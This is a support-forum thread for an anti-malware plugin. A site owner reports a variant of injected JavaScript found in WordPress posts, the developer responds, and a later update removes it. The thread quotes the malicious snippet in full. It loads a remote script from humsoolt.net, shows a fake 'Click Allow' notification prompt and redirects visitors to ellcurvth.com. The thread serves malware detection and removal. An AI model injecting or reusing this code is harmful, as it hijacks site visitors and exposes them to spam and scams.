script variation ellcurvth.com

Home Forums Support Forum script variation ellcurvth.com

This topic contains 3 replies, has 2 voices, and was last updated by  Robert C. 5 years ago.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #2378

    Robert C.
    Member

    

    hiya, great tool as always!!! many many thanks Eli.

    found that a new variation of this injected code is not being picked up.
    tried a mysql query and it’s not picking up a char immediately after ““Allow—. char looks like a sq with 009D

    when pasted into a sql query however it renders as a red bullet

    database charset is utf8mb4_unicode_ci
    have wrapped the char in a code tag, see html view of this msg.

    
    ;
    const overlay = {“delay”:3000,”overlayStyle”:{“background”:”rgba(0,0,0, 0.6)”},”title”:”Attention!”,”description”:”Click “Allow” to subscribe to notifications and continue working with this website.”,…(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
    const s = document.createElement(‘script’);
    s.src=’//humsoolt.net/pfe/current/tag.min.js?z=2774009′;
    s.onload = (sdk) => {
    sdk.updateOptions({overlay, overlayTranslations})
    sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
    sdk.onPermissionAllowed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
    sdk.onPermissionDenied(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
    sdk.onAlreadySubscribed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
    sdk.onNotificationUnsupported(() => {});
    }
    document.head.appendChild(s);

     

    #2380

    Anti-Malware Admin
    Key Master

    Did you find this code in your DB?

    I checked it against my current definition and it should be found by my DB Scan.

    If this code is found in a file then please send me this file so that I can recheck it.

    #2381

    Robert C.
    Member

    it’s in posts files (not necessarily pages but other posts) /wp-admin/post.php?post=1615&action=edit

    happy to give access to phpmyadmin and wp-admin

    #2387

    Robert C.
    Member

    just a quick thank you… the latest version deletes the variation of malware… can’t recommend your plugin enough! many many thanks.

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.

Comments are closed.